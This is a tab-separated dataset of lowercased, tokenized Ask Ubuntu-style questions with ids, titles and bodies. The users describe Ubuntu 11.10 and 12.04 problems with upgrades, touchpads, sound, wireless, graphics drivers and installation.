127772	power supply cable removed from socket while upgrading to 12	today i started to upgrade to ubuntu 12 when i accidentally tripped on the power supply cable and the pc shut down . now it displays two options . to start normal or in recovery mode but nothing works ... do i have to format ?
127775	does touch mouse logitech m600 works on ubuntu ?	i am interested in the purchase of touch mouse `` logitech mouse m600 '' and wanted to know how it works in ubuntu 12.04 .
127777	ubuntu 12.04 boot up is unreasonably slow	one of the things i like about ubuntu is the allegedly fast boot time , unfortunately that 's not the case for me anymore . on my computer ubuntu itself boots up in forty seconds ( from choosing ubuntu in the grub menu to reaching the login screen ) , and my user boots up in in almost fifty seconds ( from entering my password to the appearance of the dash ) . i want to note that although i never had fast boot-ups in ubuntu , ( the boot of ubuntu itself was always slow ) , since the last upgrade things have just gotten worse . i also want to note that after the boot itself my ubuntu runs quite smooth almost without any lag . some hardware details : memory : 2.0 gib processor : intelâž pentium ( r ) d cpu 3.00ghz ă 2 graphics : geforce 7100 gs/pcie/sse2 i have both ubuntu and windows xp with dual boot , each installed on a different disk . my ubuntu runs on an healthy 500 gb wdc hard disk with average read time of 108 mb/s . my partitions can be seen in the following image : does anyone have any idea what makes my computer boot slowly , is my hardware outdated ? did i make any crucial mistake with the partitions when i first set ubuntu up ? is there any way to solve it ?
127779	upgraded to 12.04 , still displays the old login screen	the login screen still says ubuntu 11.10 . needless to say , the upgrade was interrupted . i was able to continue the interrupted upgrade and get a stable machine . lsb_release -a tells me its 12.04 .
127782	ubuntu 12.04 . compiz failure . computer has nothing to use	i updated to ubuntu 12.04 with compiz..now compiz is failing and i have no tool bars or ways of getting to applications except for firefox from a link presented from sending an error report . how am i supposed to : fix this mess with no navigation to get to the terminal , or software center . when will this problem be fixed ? when i updated the system why did n't it change me back to the crappy unity interface ( no offense ) . if it ca n't be fixed how do i get my files back ?
127783	ubuntu 12.04 lenovo x61t , how to assign display buttons as shortcuts ? bug ?	i got some problems to get display buttons to work . i 'm trying to assign functions ( settings- > keyboard- > shortcuts ) to the display buttons on my lenovo x61 tablet notebook . the buttons are : - change screen orientation - recognized as 'screensaver' - toolbox - recognized as 'touchpad toggle' ( same functions as with fn-key available ? ) if i assign them to non-custom shortcuts - everything is all right , but when i do this with custom shortcuts , e.g . running a script , they behave as normal not assigned buttons ( starting the screensaver or locking the touchpad ) . any ideas how to fix that ?
127795	synaptic installs firefox when uninstalling chromium	i use iron so i wanted to uninstall chromium , so i marked the packages for removal in synaptic and clicked `` go '' and i was startled to see synaptic install firefox . after that was done , i marked the ff packages for removal and took a closer look . synaptic wanted to install epiphany . what the heck ?
127796	keepass2 plugins directory	where is keepass2 plugins directory ? i 'm using ubuntu 12.04 lts .
127801	does anyone know why apt-cacher-ng always downloads an index file ( packages.gz ) even though its exist on the apt-cacher-ng 's cache ?	i just updated from 11.04 to ubuntu 12.04 by doing a fresh install . i installed apt-cacher-ng and notice something strange about it . it 's always downloading an index file ( packages.gz ) even though the file exists in the apt-cacher-ng 's cache . this is what exactly happened : on ubuntu 10.10 & 11.04 apt-cacher-ng installed & configured on my laptop , then i reload and install some packages after that i configure my friend 's laptop with apt-cacher-ng proxy ( 192.168.1.1:3142 ) , reloading repository was blazingly fast , finished in a second without using my internet connection ( checked on system monitor , total received just 15kb ) on ubuntu 11.10 & 12.04 apt-cacher-ng installed and configured on my laptop , then i reload and install some packages after that i configure my friend 's laptop with apt-cacher-ng proxy ( 192.168.1.1:3142 ) , reloading repository was really slow ! , apt-cacher-ng redownload the index file from the internet .
127802	hp laserjet printer not recognized in 12.04 with hplip installed	my laserjet p1005 used to work fine after installing hplip in 11.10 . now it is not recognized when plugged in . no pop-up , nothing . any ideas ?
127810	how can i move down the side panel in ubuntu 12/04 ?	how can i move down the side-panel in ubuntu 12/04 . if you do this : http : //www.youtube.com/watch ? v=lr0glreows0 after sudo cp . / * / usr/share/unity/4 terminal says that the purpose of guidance is not a directory . sorry for the bad spelling .
127812	enable window 'snap ' in 12.04 ( window maximation on drag to edge )	i have recently updated to 12.04 . the feature which maximises the window if dragged to the upper screen edge , taking the right half if dragged to the right edge and so on , is now missing . ( i 'm coming from version 11.10 ) i have n't done any major modifications on the os and tried several tutorials for enabling this behaviour with compiz . is this feature gone forever ? if not , how to re-enable it ? it was extremely helpful for programming and i do not want to have some kind of workaround with keyboard shortcuts . but if it 's not possible with mouse dragging , how can i enable some shortcut ? if you need additional information about my system configuration , please let me know with instructions about how to get this information .
127813	screen saver just wo n't die in mythbuntu after upgrade to 12.04	i have a computer dedicated to media playback which i just updated to version 12.04 . since the upgrade , i just ca n't seem to get the screen saver to stop coming on while watching just about any kind of video . i have of course opened system settings - > screensaver to try and turn it off . whenever i do , i get this error message : it does n't seem to matter if i press `` cancel '' or `` ok '' . either way , i get to the screensaver interface settings where i put `` mode : '' into `` disable screen saver '' . and yet , the screen turns black about 15 to 20 minutes into any video . i looked for solutions on the web . i 've tried this at the command line : xset -dpms & & xset s noblank & & xset s off lastly , i found some suggestions for editing the /etc/x11/xorg.conf file . however , mine is completely blank , and it seems that if i put anything at all in there , it causes the x server to fail completely on boot . how do i get my screensaver to be off and to stay off ?
127815	using quad core , but only 1 cpu entry in `/proc/cpuinfo` ? is smp running on my computer ?	i just upgraded my system and did a clean install of ubuntu when i did ( installed oneiric ocelot from the cd last week but yesterday upgraded to 12.04 lts ) . i have an i7 920 ( quad core with hyperthreading ) , so i should be seeing 8 processors , but i only see one in the system monitor graph . cat /proc/cpuinfo returns : processor : 0 vendor_id : genuineintel cpu family : 6 model : 26 model name : intel ( r ) core ( tm ) i7 cpu 920 @ 2.67ghz stepping : 4 microcode : 0x10 cpu mhz : 2672.633 cache size : 8192 kb physical id : 0 siblings : 1 core id : 0 cpu cores : 1 apicid : 0 initial apicid : 0 fpu : yes fpu_exception : yes cpuid level : 11 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx rdtscp lm constant_tsc up arch_perfmon pebs bts rep_good nopl xtopology nonstop_tsc aperfmperf pni dtes64 monitor ds_cpl vmx est tm2 ssse3 cx16 xtpr pdcm sse4_1 sse4_2 popcnt lahf_lm ida dts tpr_shadow vnmi flexpriority ept vpid bogomips : 5345.26 clflush size : 64 cache_alignment : 64 address sizes : 36 bits physical , 48 bits virtual power management : from my recollection of previous installs with smp working , there should be multiple entries in /proc/cpuinfo -- one per processor . i see only one . my first thought was that a non-smp kernel was installed . however , uname -a returns : linux compname 3.2.0-24-generic # 37-ubuntu smp wed apr 25 08:43:22 utc 2012 x86_64 x86_64 x86_64 gnu/linux so am i using all available cores or not ? and if not , what is causing it given that i appear to be running an smp kernel ? thanks !
127829	synaptics touchpad - cursor moves around when just 'tapped ' after ubuntu 12.04 upgrade	after upgrading to version 12.04 lts i experience some problems with my touchpad . everytime i tap on the touch the cursor is moving around ( for example if i want to close a window , i click on `` x '' button from touchpad , the cursor is moving and not always hit the `` x '' button ) . touchpad left click , right click is working well , but tap ... did u guys experience the same problem ? is there something related to sensitivity ? how to fix it ? thanks edit : need help ! ! ! it is really annoying
127836	sound not working on 11.10	ubuntu 11.10 my speakers have stopped working - no sound is coming out . i tested speakers on my friends windows machine and they 're working fine . i 'm not sure of what to post , please help me guide of how get the sound back . any ideas are appreciated .
127838	problems with graphic performance in ubuntu 12.04	in advance : my english is not perfect ; ) processor : intel® core™2 duo cpu e8500 @ 3.16ghz × 2 memory : 3,9 gib graphics : geforce gtx 460 ubuntu 12.04 32-bit fresh installed ( previously 11.10 32-bit ) driver : nvidias accelerated driver ( version current-updates ) probelm : in ubuntu 12.04 i have problems with the performance of the graphics ( games for example : volley brwawl , neverball , beep and minecraft ) , and effects of windows ( always at minimize , maximize ... ) there are laggs at animations , and the laggs in games are extremely annoying . problems occur only in ubuntu 12.04 , everything was good in 11.10 . no problems with youtube videos , hd videos . is there a solution ? bbecause i have found nothing here in the forum and on google . or is an update coming soonfor driver or whatever ? ( this bug is already registered in launchpad . ) thank you !
127839	how to compile and run java file using geany	i am trying to to compile and run .java file using geany but its not working . can anyone explain me why ? sorry for english .
127840	could n't load specified math lib ( s ) when using a script from cpan	i 'm using perl ssh module from cpan . after executing the script , i get this error math : :bigint : could n't load specified math lib ( s ) , fallback to math : :bigint : :calc at /usr/local/lib/perl5/site_perl/5.14.2/crypt/dh.pm line 6 this is the script : ! /usr/bin/perl use net : :ssh : :perl ; my $ host = 'mymachine.com ' ; my $ user = 'xyz ' ; my $ pass = 'xyx ' ; my $ ssh = net : :ssh : :perl- > new ( $ host ) ; $ ssh- > login ( $ user , $ pass ) ; my ( $ stdout , $ stderr , $ exit ) = $ ssh- > cmd ( $ cmd ) ;
127841	find symlink to a known file /etc/init.d/ portmap	i 'm looking for the /etc/rc.x/ softlink to /etc/init.d/portmap . does anyone know where portmap is called ? how can i find all symlinks to a file ? chris
127843	gnome shell 3.4 - i ca n't change theme	problem after upgrade to gnome shell 3.4 ( ubuntu 11.10 ) i installed ubuntu 12.04 over the previous setting the /home partition . i installed the gnome shell , unfortunately i can not change a theme : http : //ubuntu.pl/forum/download/file.php ? id=2631
127845	how to hide folder	how can i hide a folder and only see it when ctrl+h is pressed ? i have checked in properties and could n't find it .
127848	wine ca n't find gnome-keyring-pkcs11.so	i am trying to start a program using wine on ubuntu lts 12.04 64 bit when i do this , i get the following error message ... /usr/lib/i386-linux-gnu/pkcs11/gnome-keyring-pkcs11.so : /usr/lib/i386-linux- > gnu/pkcs11/gnome-keyring-pkcs11.so : can not open shared object file : no such file or > directory when i try to symlink the 64 bit libraries , of course , i get the following ... jackie @ jackie-latitude-e6410 : ~/tmp/ac $ wine ttg.exe p11-kit : could n't load module : /usr/lib/i386-linux-gnu/pkcs11/gnome-keyring-pkcs11.so : /usr/lib/i386-linux-gnu/pkcs11/gnome-keyring-pkcs11.so : wrong elf class : elfclass64 wine : unhandled page fault on read access to 0x00000000 at address ( nil ) ( thread 0009 ) , starting debugger ... err : seh : raise_exception unhandled exception code c0000005 flags 0 addr 0x7bc47aac is there a package that installs the 32-bit as well as the 64bit ? update : appears to be a bug in ubuntu w/ 1.4 https : //launchpad.net/~ubuntu-wine/+archive/ppa i used these steps and my application worked http : //www.noobslab.com/2012/04/install-wine-152-on-ubuntu.html not sure exactly why but it appears to ignore the error if you use the 1.5 .
127851	change boot screen resolution	how i can change the boot screen resolution in ubuntu 12.04 to 1680 1050 ? the resolution now is very small
127853	hidden launch bar would n't slide-out when moused over , now it wo n't hide away .	when the launch bar is hidden , i have trouble getting it to slide out when i move the mouse pointer to the left side . after adjusting the settings under settings -- appearance -- behavior , the bar no longer hides when a browser is open . is there a fix for this . this all happened when i was looking for a way to change the icon sizes in the launch bar . documentation from linux.com told me to do it under settings -- appearance , but there was no way to do it . any help is appreciated ! thanks .
127858	live cd 12:04 keeps running - no welcome screen	i downloaded the 32 bit iso file for the new ubuntu 12.04 and burned a cd . when i restart my computer the cd keeps running for half an hour but i do n't get a welcome screen . a new download and cd does not solve the problem . upgrating from 11 to 12 does work without any problems but i want to install from scratch . with best regards , edwin
127859	launcher shows up on the wrong monitor	i have nvidia drivers and dual monitors . it worked fine in 11.10 but since todays updates , my unity `` launcher '' is only on right monitor . on vanila ubuntu display settings it recognizes only one monitor . and it looks like this : so , the questions might be : why ubuntu 's `` displays '' shows only one monitor where nvidia drivers shows two ? i assume nvidia overwrites ? after lot of playing between these two settings , i ca n't manage to move menu launcher to left screen . any suggestions ?
127867	is this temperature normal for i5 cpu ?	anyone running a i5 cpu with ubuntu ? here 's my output of sensors : coretemp-isa-0000 adapter : isa adapter physical id 0 : +53.0°c ( high = +86.0°c , crit = +100.0°c ) core 0 : +49.0°c ( high = +86.0°c , crit = +100.0°c ) core 1 : +53.0°c ( high = +86.0°c , crit = +100.0°c ) acpitz-virtual-0 adapter : virtual device temp1 : +52.0°c ( crit = +99.0°c ) thinkpad-isa-0000 adapter : isa adapter fan1 : 3414 rpm i 'm not sure if it 's beyond standard , i 'm running chromium browser only , and top shows no process went above 10 % cpu usage
127872	ubuntu 12.4 , 11.10 crash/freeze at installation	ubuntu is my primary operating system , and i do not have windows installed anymore . when i try to install ubuntu 12.4 or 11.10 , somewheare at 90 % of the installation completed it either crashes , either it switches to the terminal ( fullscreen if you know what i mean ) , or it will freeze . this has been ongoing for a while . i 've tried different disks to install ubuntu , the flash drive , and even the low quallity graphics installer . i 've tried many of they'se things , but none worked . my computer is asus p5ql pro , ati radeon hd 3850 , and intel dual core 3gh . please help ! ! ! i dont want windows anymore , i just need linux .
127877	dash does not keep `` sources '' filter setting after reboot	i love that its finally possible in 12.04 to turn off the `` recommended software '' section ( or whatever its called ) in the dash ... yet my understanding of it was that it would be possible to turn it off permanently . after i shut down and restart my pc all dash settings have been set back to default and the software center sources are turned on again . this is annoying . is there a way to turn it off permanently or do i have to live with turning it off in the filter options manually everytime i boot into ubuntu ?
127878	problems with icons and shutting down ubuntu 12.04	i recently upgraded from 11-10 to 12.04 as a dual boot ( windows 7 ) and am having problems with shutting down . i installed from a cd that i burned from the iso file , and to get it to boot from the cd , i needed to install the special help program from windows that would then recognize the cd as the system booted.the installation gave me my own user account as well as a guest account . for the user account there is no `` gear '' icon ( in the upper rh side ) from which to access the shut down menu . interestingly the icons for the home folder , the ubuntu one folder , and the system settings folder are missing , although there are blank places shows these names if the mouse cursor is positioned over these areas . they will even launch with the press of a key - but no icons are visible . for the guest account , all of these icons are visible and usable . the problem that occurs in shutting down is that i need to leave the user account , move to the guest account ( so that i can access the top right `` gear '' icon that has the shut down menu item ) and press the shut down button . the problem here is that when the shut own menu appears and i press the confirmation that i wish to shut down the computer , the page blanks ( as one might hope in the process of closing down ) , and then pops up with the log in menu , giving the option of logging in as a user or as a guest . so the questions are : 1 ) how do you reinstate the far right top icon from which you can access the shut down drop down menu in the user account page . 2 ) how do you get the icons to display properly on the left hand side ( home , ubuntu one , system settings , and workspace switcher ) 3 ) how do you get the system to turn of when you press the shut down button ! boy oh boy ! thanks a bunch for any help !
127880	alps touchpad stops working after reboot	i recently upgraded to 12.04 lts . my compaq presario cq-40 324la touchpad worked after first restarting after installation . but after restarting a second time , the touchpad is completely disabled , without having changed anything in the system . i 've tried solutions but have n't had good results . the applications i 've installed ( fro `` solutions '' are : pointing devices synaptiks dconf-tools i 've also tried updating grub , adding this line : grub_cmdline_linux_default= '' quiet splash i8042.nomux '' ) i tried these commands in a terminal . neither has worked . sudo modprobe -r psmouse sudo modprobe psmouse proto=imps el touchpad alps se desactiva al reiniciar recién he actualizado a ubuntu 12.04lts y a mi parecer ha mejorado mucho con respecto a 11.10 ... pero ese no es mi punto ahora . el touchpad funcionó correctamente luego del primer reinicio después de la instalación . pero luego de volver a reiniciar , el touchpad queda totalmente deshabilitado sin haber hecho cambio alguno en el sistema . he probado las soluciones en su mayoría y no he tenido buenos resultados . las aplicaciones que he instalado ( de las `` soluciones '' ) son : -dispositivos apuntadores . -synaptiks -dconf-tools y he intentado también actualizando el grub ( añadiéndole una linea así : grub_cmdline_linux_default= '' quiet splash i8042.nomux '' ) intenté en la terminal con el comando : sudo modprobe -r psmouse sudo modprobe psmouse proto=imps ninguno me ha resultado bien . la laptop es compaq presario cq-40 324la
127884	touchpad stops working after suspend on lenovo t520	sometimes after i suspend my lenovo t520 laptop , the touchpad stops responding . the mouse joystick on the keyboard works , the mouse buttons between the keyboard and the touchpad works , but when i move my finger on the touchpad the mouse cursor does not move . i am using ubuntu 12.04 , installed fresh a few days ago .
127888	flash chat problem , under the ubuntu 1204 ?	just this time every time i hit space on the chat while playing flash game on web browsers like games from facebook or g+ , the whole screen game-play is going down , and i cant see the game sometimes it crash while chatting at poker room or other games rooms , anyone have clue how to fix it ?
127889	how is possible that ubuntu 12.04 32bit can see all of 6gb ram	i have ubuntu 12.04 32bit and system is displaying all of my ram 5.7 gib , how is this possible ?
127892	how to find a text file which contains a specific word inside ( not in its name )	i want to find a text file in my hard disk which contains a specific word . i want to use a graphic application . i 'm on 12.4 `` precise pangolin '' . prior to ubuntu 12.4 i used to start in the dash an application , i think it was called `` search for file ... '' , whose icon was a magnifying glass . the first screenshot here : http : //ubuntu.paslah.com/searching-files/ in ubuntu 12.4 i ca n't find that simple application any more .
127902	where is the iso file to burn image to cd	i have installed infrarecorder and it says to burn the .iso image . i am by far not computer literate and i do n't know what an .iso file is . am i suppose to download the entire application to the computer and then onto the cd . i was trying to avoid putting the entire file on my computer . how do you burn from internet ubuntu page onto the disc . thank you for any answers .
127904	why is there no option to install alongside win7 with the 12.04 lts cd ?	i just downloaded both the 32-bit version of 12.04 lts precise pangolin and burned it onto cd . when trying to install there is no option to install alongside win7 . i tried the 11.10 cd and the option was there . i ended up having to install 11.10 and then upgrading to 12.04 online . why was there no option to install alongside win7 with the 12.04 lts cd ?
127905	upgrading to 12.04 seems to have stopped	it was installing rather slowly , slower than 11.10 installed but i figured that there was just more to install , but the terminal output of `` installing system '' shows several errors , most trying to get nvidia updates and failing because it ca n't find the modules , and then sat saying `` ubuntu ubiquity : '' with nothing after it but blank space . on opening firefox to come here , it added a few kernel entries but still does not seem to be going anywhere , it 's not even writing/reading to the hard drive . i 'm not sure whether to restart or wait and see what happens . if anyone could advise me what to do that would be very helpful . many thanks .
127906	ubuntu 12.04 google chome - email links do n't open thunderbird	just upgraded to ubuntu 12.04 and installed google chrome and thunderbird . when i click on an email address link in google chrome it does nothing most of the time but some of the time it opens a new chrome tab and signs me into googlemail , but in ubuntu 11.10 it would open thunderbird to write the email . how do i get thunderbird to open to write the email ? thanks
127908	md5sum of ubuntu 12.04 i386 desktop .iso does not match	i downloaded the 12.04i386desktop.iso from http : //www.ubuntu.com/download/desktop . the startup disk creator when creating the bootable usb says that checksum does not match . i repeated the download many times using torrents too , with no avail . could anybody help ?
127909	installing ubuntu 12.04 next to win7 - no boot menu	i have installed windows 7 today and right after installed ubuntu 12.04 next to it . now after rebooting the machine , it goes right into win7 without asking me anything at the boot menu which os to load . in windows i can see that the ubuntu partitions are still there . thanks
127911	how to install 32 bit jdk on 64 bit ?	is there any way to install 32 bit jdk on 64 bit ubuntu 12.04 ? i installed 64 bit versions of java ( jdk-jdk6 ) on ubuntu , but when i do those steps ( i have applied for 64 bit versions of java ) to 32 bit jdk and type java -version it gives me a no such file or directory error .
127913	ubuntu software center not opening	i just installed ubuntu 12.04 by completely removing windows . now i am unable to open ubuntu software center . however i am able to see the icon on my desktop . suppose i can open the software center successfully ... how can i install the required drivers ? can i use the cds ( drivers , webcam , facerecognition ) that were given at the time of purchase of my inspiron ? please guide me in this respect . i wish to explore the world of linux .
127921	video drivers problem	i am not getting satisfactory video output after installing ubuntu 11.10 . i have a 1gb ati raedon graphics card but there doesnt seem to be drivers for that . system information shows : driver unknown experience standard
127922	speaker icon in taskbar is missing in the gnome classic ( ubuntu 12.04 )	today i had upgraded to ubuntu 12.04 , but the speaker icon in the taskbar of the gnome classic is missing . help me in resolving this .
127923	how can i update ubuntu offline without using synaptic or keryx ?	i use ubuntu 12.04 at my home and have good internet connection and my system works fine . one of my friend is having small office and he is thinking to switch from windows to ubuntu 11.10 or above . the problem is that he does not have an internet connection . he ask me that is there any possibilities to install all updates without having internet . i make many search , i found this question that says using keryx or synaptic manager will do that . but i am using 11.04 and there is no synaptic manager in that so that i generate and download script.in other way when i try to install keryx ( on any fresh install system on which i have to fetch the updates or system having internet connection ) its shows me error that i am not having python.but i am having that installing these application does n't meet dependencies . the key point here is how i install updates without having internet on fresh install ubuntu . how i install ubuntu-restricted-extras
127927	touchpad stops working after restart on a compaq presario cq-40 324la	the touchpad worked correctly after the first reboot after installation , but then , without making any changes on system , restarting again , the touchpad was totally disabled . i 'm working on a laptop compaq presario cq-40 324la .
127934	fan running almost constantly on hp pavilion dv9570	i 've just installed 12.04 as a clean install on my laptop ( previously had 11.10 installed ) and i 've noticed that my fan is running almost constantly . i 'm a linux newbie , so i 'd be grateful if you could treat me like an idiot when you 're answering my question - just so i have a reasonable chance of understanding what to do . thanks rob
127935	poor battery life on an asus u45j	i have a question about ubuntu working on my laptop . after i installed ubuntu 11.10 on my laptop i noticed that my laptop battery life time reduced to 2.5h when it is full , while its life time in windows is about 4.5h . also i noticed my laptop fan works hardly when my laptop is on and is on its easy mode ( no program is run ) . in this time my laptop body becomes so hot.i afraid of working with ubuntu on my laptop . does ubuntu have any problem with my laptop ? i should add , non of this problems hapened when i 'm working with windows.i love working with ubuntu . if there is a solution please help me . my laptop is 'asus u45j' cpu : i5-450m vga nvidia geforce 310m ; vram : 1gb my laptop is 64bit and i downloaded ubuntu 11.10 64bit
127950	keyboard and touch pad is not working on a dell xps 15z	i am new linux user , i dont anything about how linux works , i am working on that , but mean while , i installed ubuntu on my dell xps 15z , it works fine , except for the keyboard and the touch pad mouse . i searched for the solution but no success , please anyone have solution for this , i am very excited about linux , it very beautiful , very user friendly , i want to replace my windows with it . ps . please be specific in your answer 'couse i dont know anything about linux , keep in my i am a very new user .
127954	no audio after 12.04 upgrade from 11.10	i simply do n't have any sound on my ubuntu 12.04 ( precise ) , after upgrade from 11.10 . using this command : sudo killall pulseaudio ; rm -r ~/.pulse* , the audio comes back but when i turn it off and on again the audio is gone . again . alsamixer works fine all the bars on top . and the sound configuration reveals something ; it says `` salida para torpes '' as well known as `` salida boba '' . a translation would be `` dummy output '' . so i already do n't know what 's going on . : /
127956	gnome ppp does n't connect	i am a new ubuntu user and connect to the internet using wi-fi broadband on my notebook . but i need to setup a dial-up connection through my phone which can keep me online while i travel . i have tried connecting to dial-up using pppconfig , wvdial and gnome-ppp . i do not know whether they use the same files for connecting but i have only been able to connect using gnome-ppp . but the connection is intermittent and disconnects every five seconds or so . the exit code is 16 which i checked in man and got to know that the modem hangs itself up . i am connecting my phone to ubuntu as a usb modem . and as i am new i might have skipped a step or two . please suggest a solution or an alternative to this . i have put down the gnome-ppp log . thanks . -- > wvdial : internet dialer version 1.61 -- > can not get information for serial port . -- > initializing modem . -- > sending : atz atz ok -- > modem initialized . -- > sending : atm1l3dt*99***1 # -- > waiting for carrier . atm1l3dt*99***1 # connect -- > carrier detected . waiting for prompt . ~ [ 7f ] } # @ ! } ! } $ } } = } ! } $ } % \ } '' } & } } } } } # } % b # } % } % } & } *urw } ' } '' } ( } '' mx~ -- > ppp negotiation detected . -- > starting pppd at sat apr 28 21:55:55 2012 -- > warning : could not modify /etc/ppp/chap-secrets : permission denied -- > -- > chap ( challenge handshake ) may be flaky . -- > pid of pppd : 2459 -- > using interface ppp0 -- > pppd : xu ! -- > pppd : xu ! -- > pppd : xu ! -- > pppd : xu ! -- > pppd : xu ! -- > pppd : xu ! -- > pppd : xu ! -- > pppd : xu ! -- > pppd : xu ! -- > disconnecting at sat apr 28 21:56:01 2012 -- > the ppp daemon has died : a modem hung up the phone ( exit code = 16 ) -- > man pppd explains pppd error codes in more detail . -- > try again and look into /var/log/messages and the wvdial and pppd man pages for more information . -- > auto reconnect will be attempted in 5 seconds -- > can not get information for serial port . -- > initializing modem . -- > sending : atz atz ok -- > modem initialized . -- > can not get information for serial port . -- > initializing modem . -- > sending : atz atz ok -- > modem initialized . -- > sending : atm1l3dt*99***1 # -- > waiting for carrier . atm1l3dt*99***1 # connect -- > carrier detected . waiting for prompt . ~ [ 7f ] } # @ ! } ! q } } = } ! } $ } % \ } '' } & } } } } } # } % b # } % } % } & } *u69 } ' } '' } ( } '' # w~ -- > ppp negotiation detected . -- > starting pppd at sat apr 28 21:56:07 2012 -- > warning : could not modify /etc/ppp/chap-secrets : permission denied -- > -- > chap ( challenge handshake ) may be flaky . -- > pid of pppd : 2470 -- > using interface ppp0 -- > pppd : xu ! -- > pppd : xu ! -- > pppd : xu ! -- > pppd : xu ! -- > pppd : xu ! -- > pppd : xu ! -- > pppd : xu ! -- > pppd : xu ! -- > pppd : xu ! -- > disconnecting at sat apr 28 21:56:09 2012 -- > the ppp daemon has died : a modem hung up the phone ( exit code = 16 ) -- > man pppd explains pppd error codes in more detail . -- > try again and look into /var/log/messages and the wvdial and pppd man pages for more information . -- > auto reconnect will be attempted in 10 seconds -- > can not get information for serial port . -- > initializing modem . -- > sending : atz atz ok -- > modem initialized . -- > can not get information for serial port . -- > initializing modem . -- > sending : atz atz ok -- > modem initialized . -- > sending : atm1l3dt*99***1 # -- > waiting for carrier . atm1l3dt*99***1 # connect -- > carrier detected . waiting for prompt . ~ [ 7f ] } # @ ! } ! @ } } = } ! } $ } % \ } '' } & } } } } } # } % b # } % } % } & } *uvm } ' } '' } ( } '' p } $ ~ -- > ppp negotiation detected . -- > starting pppd at sat apr 28 21:56:20 2012 -- > warning : could not modify /etc/ppp/chap-secrets : permission denied -- > -- > chap ( challenge handshake ) may be flaky . -- > pid of pppd : 2481 -- > using interface ppp0 -- > pppd : xu ! -- > pppd : xu ! -- > pppd : xu ! -- > pppd : xu ! -- > pppd : xu ! -- > pppd : xu ! -- > pppd : xu ! -- > pppd : xu ! -- > pppd : xu ! -- > disconnecting at sat apr 28 21:56:25 2012 -- > the ppp daemon has died : a modem hung up the phone ( exit code = 16 ) -- > man pppd explains pppd error codes in more detail . -- > try again and look into /var/log/messages and the wvdial and pppd man pages for more information . -- > auto reconnect will be attempted in 20 seconds -- > can not get information for serial port . -- > initializing modem . -- > sending : atz atz ok -- > modem initialized .
127959	wireless available but not being used with a bcm4311	i 'm re-purposing a gateway 6703 . after following advice , the broadcom hardware shows up in ifconfig , and rfkill shows no blocking . the problem is , even though wifi is enabled , the no wireless scan or connection is made . any ideas why that might be ? can i force the wireless to connect ? is there an app i should be running ? thanks in advance for any help
127960	unable to upgrade from 11.10 to 12.04	i am unable to upgrade from 11.10 to 12.04 . after the download completed and other process the final message comes as the upgrade has aborted . your system could be in an unusable state . a recovery will run now ( dpkg -- configure -a ) . the only option tab is close . what should i do ? i try 5 times but the same thing is happening even i restart the laptop . i am using windows8 consumer preview as other boot option .
127963	how to safely import music into rhythmbox in 12.04 ?	i want to import a music folder into rhythmbox but from the preferences in rhythmbox , the folder has to be of the fixed form , like artist/album or artist/artist-album and so on . why ca n't rythmbox read the metadata of the mp3 to know the artist , album details and why ca n't all the music files be present inside a single folder called music ? why should be there a dependency on the folder name ?
127965	cd rip slow on ubuntu 12.04 . how can i increase ripping speed ?	i 'm trying to rip an audio cd from my old library but when i try ( with every app ) to do that , the process is too slow . for 2 tracks it need more than 2 hour and then it crash ! i tried to make : $ sudo hdparm -d1 /dev/sr0 but the response is $ /dev/s $ /dev/sr0 : setting using_dma to 1 ( on ) hdio_set_dma failed : inappropriate ioctl for device hdio_get_dma failed : inappropriate ioctl for device r0 : setting using_dma to 1 ( on ) hdio_set_dma failed : inappropriate ioctl for device hdio_get_dma failed : inappropriate ioctl for device
127966	ubuntu 12.04 issue	the installation completes and i restart the computer . i enter my password and am taken to what i believe is supposed to be the desktop . it is a blank , sort of mauve/orange colored screen with no icons nor menu bar ( s ) . the screen suddenly becomes black and i can see only my mouse pointer ( i am able to move the pointer ) . then a window pops up containing the following error message : system program problem detected do you want to report the problem now ? cancel report problem i click on `` report problem , '' and wait . nothing happens . the button itself appears to become smaller than the other button so i assume it `` clicked . '' please help me . everything appears to have installed properly but nothing is working .
127967	conky does not start in ubuntu 12.04	just installed ubuntu 12 ; but conky does not start . dmesg in terminal shows the following error : [ 63.277937 ] conky [ 2013 ] : segfault at 0 ip b70feb84 sp bf8aedb8 error 4 in libc-2.15.so [ b6fb9000+19f000 ] is this a problem with conky or libc ? are there any ppas for latest version of conky ?
127970	12.04 usb install `` boot error ''	i downloaded 12.04 64bit , i checked with md5 . seems okay . made bootable usb with usb creater . now if try to boot up from live usb . i just get `` boot error '' . nothing else . nothing else . googled around . nothing comes out . update : some additional info . the usb manufacture is sony . it is fat32 partitioned . most importantly i could install 12.04 on other systems by same usb . yes , i definitely setup my bios boot order to look for usb disk first .
127974	12.04 cd install failure . no options , simply splash screen forever	i have problems with 12.04 installation from live cd . the installation option never show up . just splash screen and no responses from any key . i tried it on my laptop and desktop . same result .
127976	what is `` zenity '' and did it crash ?	i am on ubuntu 12.04 . i was running the ubuntu customization kit but it disappeared with the following message : `` the application zenity closed unexpectedly '' . when i further ran it , it just closed after selecting the language option . it was running well on previous ubuntu versions and i made many remix of ubuntu with the application . thanks for your time .
127977	wireless is disabled by hardware switch on dell inspiron 1750	i have a problem where ubuntu ( 12.04 ) says there is a wireless network card , but it is disabled by a hardware switch . how do i turn it on ? i checked the bios , and the wireless card is enabled there . fn + f2 was also no success . the results of rfkill list : 0 : brcmwl-0 : wireless lan soft blocked : no hard blocked : yes 1 : dell-wifi : wireless lan soft blocked : yes hard blocked : yes sudo rfkill unblock wifi did nothing to the wireless status .
127978	error while playing a song playlist in audacious after pc is restarted in ubuntu 12.04 lts	i have installed ubuntu 12.04 lts on windows xp sp ii installation . all is working great . there 's only one annoying thing ... . i have installed audacious . i add a few songs in it . then i restart the pc . after restart playlist has songs in it . but if i try to play them , i get error saying so and so file ( song ) does n't exist . this happens everytime . why is this happening ? is it because this is over windows installation ? what might be the exact reason ? and how to avoid this ?
127982	everything but launcher and menu bar is black	i tried to make my launcher a different color in unity-2d ( using dconf-editor and directly changing files as per how do i configure unity 2d ? ) . now i ca n't see my background or any programs , and all i see is a black screen , the top menu bar , and the launcher . programs boot , but i ca n't see them ; the launcher responds correctly , so i know they 're there , i simply ca n't see anything . how can i fix this ?
